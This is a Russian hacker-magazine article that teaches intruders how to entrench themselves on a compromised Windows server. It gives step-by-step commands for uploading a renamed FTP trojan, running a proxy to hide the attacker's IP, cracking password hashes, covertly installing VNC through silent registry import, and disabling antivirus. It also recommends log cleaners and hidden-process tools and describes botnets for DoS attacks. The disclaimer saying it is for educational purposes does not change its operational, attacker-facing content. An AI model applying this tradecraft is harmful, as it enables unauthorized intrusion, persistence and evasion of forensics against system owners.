Карта сайта Хакер в RSS Энциклопедия Хакера PDA версия сайта Почтовые рассылки Хакера    Хакер в Twitter Хакер в ВКонтакте Приложение Хакер для Facebook Хакер на Formspring.me
Журнал Новости Форум Видео Life Xakep Live (блоги)
Bugtrack Статьи Блог Поиск English  
Хакер ищет продавцов рекламы Хакер ищет продавцов рекламы
Xakep.ru приглашает стажеров на должность менеджера по работе с клиентами. Резюме присылать по адресу hr@glc.ru....
Анатомия Cryptolocker Анатомия Cryptolocker
Он прост, как автомат Калашникова, но реально опасен. Ведь это он заставил тысячи незадачливых пользователей платить деньги своим создателям и ухитрился поставить на бабки сотрудников полиции Массачусетса (им пришлось покупать биткоины, чтобы расшифровать свои данные)!...

Windows – дом хакера

Докучаев Дмитрий aka Forb (forb@real.xakep.ru)

Спецвыпуск: Хакер, номер #048


Создаем плацдарм на взломанной машине

Всем известно, что возможности форточного cmd.exe не сравнятся с прелестями /bin/bash. По этой причине взломщики не жалуют консоль Windows. На самом деле, даже используя юзерские привилегии, можно организовать на чужой машине хороший хакерский плацдарм.

Что нам стоит дом построить?

Никто не помешает взламывать пароли, использовать прокси, ставить графические приложения на мощной тачке. Достаточно иметь некоторые консольные навыки и обладать контрольным пакетом хакерских программ.

Предположим, что у нас имеется доступ к бэкдору, который сидит на определенном порту. После коннекта и авторизации троянец запустит cmd.exe под правами SYSTEM. Но скучный cmd со стандартными утилитами малоинтересен. Но это только на первый взгляд!

Перед тем как что-то устанавливать, нам понадобится хороший FTP-сервер (чтобы без проблем закачивать нужный софт). Конечно, можно скачивать файлы с помощью FTP-сценариев или старого TFTP-протокола, но лучше раз и навсегда обзавестись хакерским демоном, например, проверенным Phantom FTP Server. Этот троян функционирует в двух режимах: с привязкой к конфигу или с привязкой к реестру. Полное описание этой чудной программы находится на сайте phantom-server.chat.ru. Там выложен архив PFS.zip, из него на взломанный сервер закачаем exe’шник. Теперь запускаем PFS (не забыв понезаметней переименовать бинарник). Поздравляю: стал доступен FTP-сервер на 2177 порту. Теперь можно коннектиться туда со своей машины и проверять работу демона. Если Phanton был запущен без конфига, он пустит кого угодно под любым логином и паролем. В принципе, так даже удобнее: ведь можно без проблем убить процесс после того, как нужный файл закачен.

Теперь, когда у нас есть FTP-доступ и командный интерпретатор, можно заливать и запускать хакерские утилиты.

Халявный и безопасный прокси

Взломщики, которые заботятся о своей безопасности, любят устанавливать на взломанные *nix-тачки лечебно-охранительный софт и часто незаслуженно забывают охватывать своей заботой дырявые Windows-серверs. В ведьпод Винду существует хороший софт, позволяющий организовывать безопасные соединения, туннели и перенаправления. Досточно поставить всего одну утилиту, и можно забыть о проблемах. Встречаем софтину bouncer (securitylab.ru/_tools/bouncer-1.0.rc6-win32.zip), которая изменит твое представление о скучном командном шелле. Прежде чем заливать эту утилиту на сервер, стоит поработать с ней на локальной машине. Запустим ее без параметров. Как видно, софтинка имеет туеву хучу опций. Совсем не обязательно указывать их все, но для уверенности в завтрашнем дне надо ознакомиться со способами применения хотя бы половины параметров из этого списка.

Начнем с главных опций. Перед запуском необходимо определить режим bouncer’a. Он может запускаться в качестве редиректора или в качестве прокси. Первый режим пригодится, если нужно временно присоединиться к какому-нибудь серверу. Например, у взломщика нет желания светить собственный IP-адрес, но очень хочется прителнетиться на www.whitehouse.gov:22 :). Нет проблем! Ему нужно просто запустить bouncer с опциями –-port 22 –-destination www.whitehouse.gov:22, а затем соединиться с сервером, где стоит прокси (в качестве порта надо указать 22). С таким же успехом можно похвастаться своим элитным хостом в IRC, скрывать истинный IP в аське и т.д.

Если же целью будет использовать настоящие пятые соксы (SOCKS5), то необходимо запустить bouncer во втором режиме, а еще лучше – в качестве демона. Для этого нужно снабдить программу тремя главными параметрами:

bouncer.exe –-port 1080 –-socks5 –-daemon.

Но это самый простой случай. В сети вертится масса сканеров на прокси, поэтому, наш сокс могут обнаружить злые хакеры. Поэтому нужно довериться параметрам, ограничивающим доступ к сервису. Рассмотрим пример запуска bouncer’а с разрешением соединения только с доверенными адресами и по определенному логину:

bouncer.exe –-port 1080 –-socks5 –-daemon –-allow 195.64.6.* --s_user x4k30r --s_password x4ck.

Кроме этого, можно создать защищенное SSL-соединение с поддержкой аутентификации по паролю. Для этого в командную строку стоит добавить три опции:

--tunnel host:port

--s_user юзер

--s_password пароль

Но и это еще не все. Разработчики bouncer’а здорово позаботились о мониторинге. Никто не мешает вести лог всех соединений и иметь доступ к административному серверу. После соединения с ним станет возможно лицезреть все активные подключения, а также зверски замочить bouncer :). Чтобы добиться всего вышеперечисленного, следует запускать bouncer.exe с advanced-опциями. Примерно так:

bouncer.exe –-port 1080 –-socks5 –-daemon –-allow 195.64.6.* --s_user x4k30r --s_password x4ck --a_bind 195.55.55.55 --a_user admin --a_password adm1n –-logfile c:\windows\error.log –-full-time.

Для удобства, эту команду можно записать в какой-нибудь bat-файл, а демон запускать через утилиту start (в background’е), чтобы старт bouncer’а не оказался последней операцией в консоли (для дальнейших действий придется создать новый сеанс).

Скажи «пароль»!

Что делает взломщик, когда добивается локальных прав в Linux? Правильно, смотрит информацию о системе, а затем ставии John The Ripper для перебора парольных хэшей. Но редко кому приходит в голову запустить Джоника на Win-платформе. А зря! Если процессор мощный, грех не использовать его ресурсы по назначению. Но прежде чем что-то устанавливать, необходимо выяснить частоту процессора. Эта процедура выполняется с помощью одной консольной команды.

Вся информация о железе хранится в специальном разделе реестра HKEY_LOCAL_MACHINE\HARDWARE. Там же записана подробная инфа о проце. Сведения лежат в ветке «HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0», которую нужно каким-то образом экспортировать в файл. Делается это простой командой: regedit /e cpu.reg HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0. После этого нужно выполнить type cpu.reg, которая выдаст сокровенные данные о CPU.

Портированный Джоник находится здесь: www.openwall.com/john/john-16w.zip. Прежде чем заливать файл, надо скачай его к себе на компьютер, а затем собрать все необходимые библиотеки и exe’шники в шпионский каталог. Синтаксис виндового Джоника ничем не отличается от пингвиньего, поэтому не буду рассказывать о параметрах запуска переборщика (при желании их можно найти в файле doc\EXAMPLE). Не исключено, что придется обзавестись парой-тройкой увесистых вордлистов, чтобы перебор был более продуктивным :).

Что я слышу? Ты говоришь, что Джон не умеет ломать хэши MySQL, а, кроме красивого MD5Inside, ты ничего не знаешь? Конечно, порой без графики не обойтись, но в данной ситуации логичнее обратиться за помощью к полезной утилите md5crack (online.securityfocus.com/data/tools/MD5Crack.exe). Программа не только переберет нужный хэш, но и попытается найти коллизию (совпадение одного и того же пароля в разных хэшах), которые очень часто встречаются в MD5.

Если переборщик запускается на короткое время (весь процесс перебора будет наблюдаться в консоли), можно использовать программу без перенаправлений. Когда есть подозрения, что брутфорс затянется на долгие дни, можно стартовать утилиту с перенаправлением в лог, а также в background-режиме (с помощью start). В любом случае, никто не мешает прибить процесс при помощи стандартной утилиты tskill.

Даешь графику!

А как быть в случае, если очень хочется запустить полноцветное графическое приложение? Естественно, что в консоли хакеру никогда не добиться старта какого-нибудь Brutus или PuTTY. Но ничего не мешает поставить на сервер VNC, а затем наслаждаться мониторингом рабочего стола.

RealVNC – проект, аналогичный RAdmin. Он служит для управления Windows через специальный viewer, который целиком и полностью показывает рабочий стол взломанного сервера. К сожалению, VNC корректно установится только при наличии административных привилегий. Если их еще нет, можно попробовать воспользоваться локальным эксплоитом под WinNT.

Берем пакет RealVNC с www.realvnc.com/download.html (там необходимо зарегистрироваться). Он поставляется в виде отдельного инсталлятора, что плохо, ведь из консоли таким сетапником не поуправлять... Но это лишь на первый взгляд: стоит проделать ряд нехитрых действий, и демон VNC благополучно установится на желаемый сервер.

Первым делом ставим RealVNC на свою машину. Когда инсталлятор попросит указать директорию, вводим какой-нибудь малозаметный путь (именно в эту папку сервис будет установлен на удаленной машине). Снимаем все галочки, которые заставят VNC прописаться в качестве сервиса – нам это не нужно. По окончании работы инсталлера запускаем файл vncconfig.exe. В первом разделе необходимо задать пароль на вход и нажать кнопку OK.

Теперь переходим к изнурительному процессу экспорта всех данных на чужую машину. Открываем реестр и ищем все ключи с подстрокой VNC. Бережно копируем названия разделов в отдельный документ – они еще пригодятся! Ради эксперимента для ленивых я пропарсил свой реестр на предмет таких разделов (я не гарантирую их полное сходство с твоими ветками!). Вот они:

HKEY_USERS\S-1-5-21-329068152-484763869-839522115-500\Software\RealVNC

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Regedit

HKEY_CURRENT_USER\Software\RealVNC

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RealVNC_is1

HKEY_USERS\S-1-5-21-329068152-484763869-839522115-500\Software\Microsoft\Windows\CurrentVersion\Applets\Reedit

HKEY_USERS\S-1-5-21-329068152-484763869-83952 2115-500\Software\RealVNC

Теперь запускаем команду regedit /e 1.reg НАЗВАНИЕ_ПЕРВОГО_РАЗДЕЛА. Когда с первой вкладкой будет покончено, экспортируем вторую в файл 2.reg. И так до конца. Программисты Microsoft не позаботились о том, чтобы regedit понимал несколько веток в одной командой строке, поэтому работа может показаться нудной :). Когда вся информация окажется экспортирована, составляем из нескольких информационных документов один-единственный vnc.reg. Благодаря тому что все данные представлены в текстовом виде, у не возникнет проблем со склеиванием файлов.

Вроде бы все готово к переносу. Создаем на удаленном сервере каталог, в точности совпадающий с тем, который мы вписали в окно инсталлятора. Теперь синхронизируем эти директории. Остался последний шаг – импорт данных реестра. Ведь vncconfig записал пароль в специальную ветку. Но не все так плохо, ведь мы только что экспортировали все данные по продукту VNC. Закачиваем vnc.reg на машину, а затем запускаем regedit с параметрами «/s vnc.reg». Опция /s помогает избежать запроса на добавление (подумай, как можно нажать OK в консоли? :)). Таким вот образом важные данные попадают в удаленный реестр. Теперь ничто не мешает запустить vncwin4.exe на удаленном сервере.

Настало время проверить проделанную работу: стартуем vncviewer.exe и указываем хост сервера с нулевым портом (например, 195.55.55.55:0), затем вводим нужный пароль и видим полноэкранный графический интерфейс. Теперь можно работать с сервером с помощью клавиатуры и мыши, а также запускать ресурсоемкий графический софт!

Атака ботами

Я совсем не упомянул про DoS-атаки. Ведь многие хакеры ищут дырявые машины, чтобы поставить на них специальный боевой софт. В наше время большую популярность набирают так называемые «боты». Бот – это не просто робот, сидящий в IRC. Хакерские боты отличаются интеллектом. Они умеют размножаться, осыпать жертву ICMP-запросами и SYN/ACK-пакетами, искать баги в интернете, подключать плагины и многое другое. Хакеру достаточно запустить один-единственный файл, и тут же бот распакует себя, запустит скрытый mIRC, приконнектится к нужному серверу и будет ждать команд хозяина. Кстати, прежде чем опознать хозяина, бот попросит у него сложный пароль и потребует совпадения хоста и идента.

Что касается поиска багов и саморазмножения, то тут все просто. Вероятно, ты знаешь, что такое авторутер. Точно такой же механизм интегрирован в обычного mIRC-бота. По требованию хозяина запускается сканер, ищущий баг в DCOM/lsass-сервисах (а также другие виндовые бреши). После того как баг успешно проэксплуатирован, бот сам себя заливает на машину и распаковывает. Новорожденный «младенец» забирается на тот же IRC-сервер, где обитает его папа :), и присоединяется к злодеяниям. Учитывая масштаб эпидемии на RPC-фронте, число таких ботов может достигать десятков тысяч. А теперь представь, что все они нападут на сервер со средним каналом. Машина просто не справится с большим напором и сразу же уйдет в даун.

Все проекты ботов приватны и трейдятся хакерами на специальных каналах. Но иногда добропорядочные админы выкладывают ботов в публичные источники (для изучения), которые можно отыскать в Гугле (смотри, например, swatit.org/bots/gtbot.html).

Вот, собственно, и все. Теперь ты знаком с азами хакерского мастерства в Windows-консоли. Как видишь, можно без особых проблем добиться полного управления системой несмотря на убогость Windows в плане удаленного администрирования. Но помни, что этот материал опубликован лишь в целях ознакомления.

WWW

Консольные помощники

Помимо вышеописанного софта предлагаю набор программ, которые существенно облегчат работу в консоли.

  • thethin.net/getsids.zip – программа, выводящая подробный список пользователей вместе с их идентификаторами. Очень полезная штука для поиска нужного аккаунта.
  • thethin.net/gettype.zip - полная информация об операционной системе. Может Полезно, если ты составляешь какие-нибудь скрипты.
  • thethin.net/getusers.zip – утилита, выводящая список подключенных пользователей. Очень удобная вещь, аналог /usr/bin/w в *nix :).
  • thethin.net/clearel.zip - логклинер :). Бережно очищает системный журнал событий прямо из консоли. У хакера всегда будет шанс реабилитироваться, если он по какой-то причине намусорил в логах.
  • www.thethin.net/IFerase.zip - еще один клинер. Правда, IFerase удаляет все записи из истории IE, а также не забывает стирать кукисы.
  • thethin.net/chgstr95.zip - программа, предназначенная для поиска нужного текста и... замены строк. Умная софтина понимает шаблоны, регвыры, потоковый ввод/вывод и умеет искать в подкаталогах. Рекомендую!
  • thethin.net/regsearch.zip - утилита для поиска и замены веток реестра. Если привыкнуть к ее параметрам, можно вообще отказаться от кропотливых процедур импорта и экспорта и делать все сразу, не отходя от кассы :).
  • thethin.net/runh.zip – софтина, запускающая background-приложения в невидимом режиме. Весьма полезна, если админ сервера периодически мониторит экран машины. Как говорится, запустил и скрыл :).
  • thethin.net/StartupCPL.zip - программа позволяет увидеть, какие приложения запускаются при старте системы. Полезно при отладке своих автозагрузочных приложений.
  • thethin.net/superkill.zip - утилита для «убийства» процессов с консоли. Немного превосходит по возможностям tskill, поэтому рекомендую посмотреть утилиту в действии.

Бдящий антивирус

Порой случается, что на взломанной Windows-машине вертится свежий антивирус. Чтобы узнать это, достаточно выполнить команду net start и внимательно ознакомиться с запущенными сервисами. Если встретится служба AVP Monitor или подобная ее, можно быть увереным, что антивирус легко перехватит хакерские утилиты (в частности, PFS). При активном антивирусе есть два выхода: либо выключить его на время командой net stop имя_сервиса, либо избегать заливки троянцев. Во втором случае придется писать собственные утилиты на подручном языке (Delphi/C++/Perl), а затем запускать их на удаленной машине.

Процедура инсталляции RAdmin'а на взломанную Windows-систему очень похожа на установку VNC. Правда, VNC кушает немного меньше ресурсов, чем его главный конкурент.

Изучи все ключики к команде regedit. Это пригодится для проведения шпионских операций.

В комплекте архива с портированным Джоником есть два прекомпиленных бинарника для процессоров AMD и INTEL. Оцени конфигурацию системы, а затем выбери подходящий вариант.

Чтобы залить файл по TFTP-протоколу, достаточно выполнить команду TFTP host GET file.

Автор и редакция не несут никакой ответственности за применение информации из статьи в незаконных целях.

Содержание  





Предыдущие номера


Предупреждение: Вся информация представлена исключительно в образовательных целях.
Ни авторы, ни редакция не несут ответственности в случае ее использования в противозаконных целях.

    Rambler's Top100